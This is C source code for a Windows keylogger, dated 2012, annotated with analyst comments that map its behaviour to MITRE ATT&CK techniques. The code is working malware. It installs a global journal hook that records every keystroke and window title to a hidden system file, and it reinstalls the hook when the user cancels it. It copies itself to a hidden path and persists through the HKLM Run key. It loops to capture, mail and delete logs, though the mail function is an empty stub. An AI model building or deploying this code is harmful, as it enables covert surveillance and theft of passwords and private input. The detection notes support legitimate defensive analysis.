/** (c) 2012 Michał (Foxbond) Chraniuk */
#include <stdio.h>
#include <windows.h>
#include <wininet.h>
// Process-wide state shared by the capture thread (klThread), the hook
// callback (klProc) and the start/stop helpers (klLog/klStop).
BOOL logging=FALSE;//TRUE while klThread's message loop should keep running
HANDLE fCap=0;//the cap file
DWORD dwCap=0;//thread ID
HANDLE hCap=0;//handle of the capture thread created by klLog
HHOOK lHook=0;//the log hook
HWND prevF=0;//our last focus
HMODULE hMod=0;//module handle passed to SetWindowsHookEx; assigned in WinMain
/*
 * Hook callback registered with SetWindowsHookEx(WH_JOURNALRECORD, ...).
 *
 * For every WM_KEYDOWN event it appends to the capture file (fCap):
 *   - the title of the active window, when it differs from the last one seen;
 *   - the key, either as the translated character(s) or as "[KeyName]".
 * All other events are passed on unchanged via CallNextHookEx.
 *
 * Analyst note: a system-wide input hook whose callback pairs window titles
 * with keystrokes and writes them to a file is the core behaviour of a
 * keylogger (MITRE ATT&CK T1056.001, Input Capture: Keylogging). The hook
 * installation call and the steady small appends to one file are the
 * observable events for host-based detection.
 */
LRESULT __stdcall klProc(int c,WPARAM w,LPARAM l)//the journal log process
{
if(c<0)
{
// Negative codes must be forwarded without processing.
return CallNextHookEx(lHook,c,w,l);
}
if(c==HC_ACTION)//there is a message sent to a window
{
// For journal-record hooks lParam points at an EVENTMSG describing the input event.
EVENTMSG *eptr=(EVENTMSG *)l;
if(eptr->message==WM_KEYDOWN)
{
DWORD dc,db;
char myBuff[256];
int virtue,ns;
// Low byte of paramL is used as the virtual-key code; the high byte is
// shifted into bits 16+ so it can be passed as the lParam of GetKeyNameText.
virtue=LOBYTE(eptr->paramL);
ns=HIBYTE(eptr->paramL);
ns<<=16;
HWND hf=GetActiveWindow();//did focus change?
if(prevF!=hf)
{
char st[256];
int nco;
nco=GetWindowText(hf,st,256);//get the windows text
if(nco>0)
{
// Window title is written on its own line, so each run of keystrokes in
// the capture file is preceded by the window it was typed into.
char myBuff[512];
wsprintf(myBuff,"\r\n%s\r\n",st);
WriteFile(fCap,myBuff,lstrlen(myBuff),&db,0);
}
prevF=hf;//last focus = prev focus
}
dc=GetKeyNameText(ns,myBuff,256);//gets the string representing keys name
if(dc)
{
if(virtue==VK_SPACE)
{
// Space is recorded as a literal blank and routed through the
// single-character branch below.
myBuff[0]=' ';
myBuff[1]='\0';
dc=1;
}
if(dc==1)
{
// One-character key name: translate with the current keyboard state so
// the written character reflects modifier keys.
BYTE kb[256];
WORD myword;
int numwords;
GetKeyboardState(kb);
numwords=ToAscii(virtue,ns,kb,&myword,0);//translate virtual key codez
if(numwords>0)//if one or two chars were copied to buffer
{
WriteFile(fCap,&myword,numwords,&db,0);
}
}
else
{
// Multi-character key names are written bracketed, e.g. "[Name]";
// VK_RETURN additionally emits a line break.
WriteFile(fCap,"[",1,&db,0);
WriteFile(fCap,myBuff,dc,&db,0);
WriteFile(fCap,"]",1,&db,0);
if(virtue==VK_RETURN)
{
WriteFile(fCap,"\r\n",2,&db,0);
}
}
}
}
}
return CallNextHookEx(lHook,c,w,l);
}
/*
 * Capture thread entry point. lpv is used as the path of the capture file.
 *
 * Opens the file for appending with the HIDDEN and SYSTEM attributes,
 * installs the WH_JOURNALRECORD hook (klProc) and pumps messages until the
 * global `logging` flag is cleared, then removes the hook and closes the file.
 *
 * Analyst notes:
 *   - The capture file is created hidden+system, so it does not appear in a
 *     default Explorer view (MITRE ATT&CK T1564.001); enumerate with
 *     attribute-aware tooling when triaging a host.
 *   - WM_CANCELJOURNAL is the message posted when journaling is cancelled;
 *     this loop answers it by installing the hook again, so cancelling does
 *     not end the capture.
 *   - Microsoft's hook documentation describes the journaling hook APIs as
 *     unsupported starting in Windows 11, which dates this listing.
 */
DWORD __stdcall klThread(LPVOID lpv)
{
//handle caps lock
MSG mymsg;
BYTE dimkeys[256];
int i;
// All-zero keyboard state table, applied via SetKeyboardState below.
for(i=0;i<256;++i)
{
dimkeys[i]=0;
}
prevF=0;
// OPEN_ALWAYS: reuse an existing capture file or create a new one.
fCap=CreateFile((char *)lpv,GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,0);
if(fCap==INVALID_HANDLE_VALUE)
{
EXIT_FAILURE;
}
// Position at end of file so new data is appended.
SetFilePointer(fCap,0,0,FILE_END);
lHook=SetWindowsHookEx(WH_JOURNALRECORD,klProc,hMod,0);//global hook;record and watch input events
if(lHook==0)
{
CloseHandle(fCap);
fCap=0;
return EXIT_FAILURE;
}
logging=TRUE;
while(logging)
{
while(PeekMessage(&mymsg,0,0,0,PM_NOREMOVE))//dont remove after processing
{
GetMessage(&mymsg,0,0,0);//get message from calling threads queue of msgs
if(mymsg.message==WM_CANCELJOURNAL)//user cancels app journaling
{
SetKeyboardState(dimkeys);//copy 256 byte array
lHook=SetWindowsHookEx(WH_JOURNALRECORD,klProc,hMod,0);
if(lHook==0)
{
CloseHandle(fCap);
fCap=0;
return EXIT_FAILURE;
}
}
else
{
DispatchMessage(&mymsg);
}
}
// Yield between polls of the message queue and the `logging` flag.
Sleep(1);
}
UnhookWindowsHookEx(lHook);
CloseHandle(fCap);
fCap=0;
hCap=0;
return EXIT_SUCCESS;
}
/*
 * Starts the capture thread (klThread) with `file` as its argument.
 *
 * Returns EXIT_FAILURE if capture is already running, if the thread cannot
 * be created, or if the thread terminates within the 5 second wait (which is
 * treated as a failed start). Otherwise the thread priority is lowered and
 * EXIT_SUCCESS is returned.
 *
 * Note: the pointer is handed to the thread as-is, so the caller's string
 * must stay valid while the thread reads it.
 */
int klLog(const char *file)
{
//start the logging
if(logging==TRUE)
{
return EXIT_FAILURE;
}
hCap=CreateThread(0,0,klThread,(LPVOID)file,0,&dwCap);
if(hCap==0)
{
return EXIT_FAILURE;
}
// A thread handle becomes signalled when the thread exits; seeing that
// within 5 s means klThread returned early.
if(WaitForSingleObject(hCap,5000)==WAIT_OBJECT_0)
{
return EXIT_FAILURE;
}
// Lowest priority keeps the thread's CPU use inconspicuous.
SetThreadPriority(hCap,THREAD_PRIORITY_LOWEST);
return EXIT_SUCCESS;
}
/*
 * Requests the capture thread to stop by clearing `logging`, then waits up
 * to 5 seconds for the thread handle (hCap) to become signalled.
 *
 * Returns false if capture was not running or the thread did not exit within
 * the wait; true otherwise.
 */
bool klStop()
{
//stop the logging
if(logging==FALSE)
{
return false;
}
logging=FALSE;
if(WaitForSingleObject(hCap,5000)!=WAIT_OBJECT_0)
{
return false;
}
return true;
}
/*
 * Placeholder for mailing the capture file. In this listing the body is
 * empty: none of the parameters are used and the function always returns
 * true. The parameter names indicate the intended mail fields (server,
 * recipient address and name, sender, subject, body, attachment path).
 */
bool klFetch(const char *server,const char *to,const char *toname,const char *from,const char *subject,const char *body,const char *attachment)
{
//send the e-mail, should be self explanatory
return true;
}
/*
 * Program entry point. Requires exactly 11 command-line arguments
 * (__argc == 12), used as follows:
 *   argv[1]      destination path for a copy of the running executable
 *   argv[2]      value name written under the HKLM Run key
 *   argv[3]      value data written under the HKLM Run key
 *   argv[4]      capture file path
 *   argv[5]      capture interval, parsed with atoi and passed to Sleep
 *   argv[6..11]  forwarded to klFetch (server, to, toname, from, subject, body)
 *
 * Host artefacts an analyst can look for, all visible in the code below:
 *   - a copy of the executable at argv[1] marked HIDDEN|SYSTEM;
 *   - a REG_SZ value under
 *     HKLM\Software\Microsoft\Windows\CurrentVersion\Run
 *     (MITRE ATT&CK T1547.001, Registry Run Keys); registry auditing such as
 *     Sysmon Event ID 13 or an autoruns review surfaces this write;
 *   - a hidden+system capture file at argv[4] that is periodically deleted.
 * The Run key is opened with KEY_ALL_ACCESS on HKEY_LOCAL_MACHINE, which
 * presumably requires an elevated token; without it the program exits here.
 */
int __stdcall WinMain(HINSTANCE hThisInstance,HINSTANCE hPrevInstance,LPSTR lpszArgument,int nFunsterStil)
{
if(__argc!=12)
{
return EXIT_FAILURE;
}
char filename[MAX_PATH];
GetModuleFileName(0,filename,MAX_PATH);//get name of the running app
// Clear attributes on any existing copy so it can be overwritten, copy the
// running image to argv[1], then mark the copy hidden+system.
SetFileAttributes(__argv[1],FILE_ATTRIBUTE_NORMAL);
CopyFile(filename,__argv[1],false);
// SetFileAttributes returns zero on failure; ERROR_SUCCESS is also zero, so
// this branch is taken when the attribute change failed.
if(SetFileAttributes(__argv[1],FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM)==ERROR_SUCCESS)
{
return EXIT_FAILURE;
}
HKEY hklm;
// Machine-wide autostart location: values here are launched at logon.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_ALL_ACCESS,&hklm)!=ERROR_SUCCESS)
{
return EXIT_FAILURE;
}
if(RegSetValueEx(hklm,__argv[2],0,REG_SZ,(LPBYTE)__argv[3],strlen(__argv[3]))!=ERROR_SUCCESS)
{
return EXIT_FAILURE;
}
RegCloseKey(hklm);
hMod=GetModuleHandle(0);//required: this module handle is passed to SetWindowsHookEx in klThread
// Endless cycle: capture for the configured interval, stop, and when the
// machine reports connectivity hand the file to klFetch and delete it.
while(true)
{
klLog(__argv[4]);
Sleep(atoi(__argv[5]));
klStop();
DWORD ThreadID;
if(InternetGetConnectedState(&ThreadID,0)==true)//are we connected to internet?
{
klFetch(__argv[6],__argv[7],__argv[8],__argv[9],__argv[10],__argv[11],__argv[4]);//e-mail the file
// The capture file is removed regardless of klFetch's return value.
DeleteFile(__argv[4]);
}
}
return EXIT_SUCCESS;
}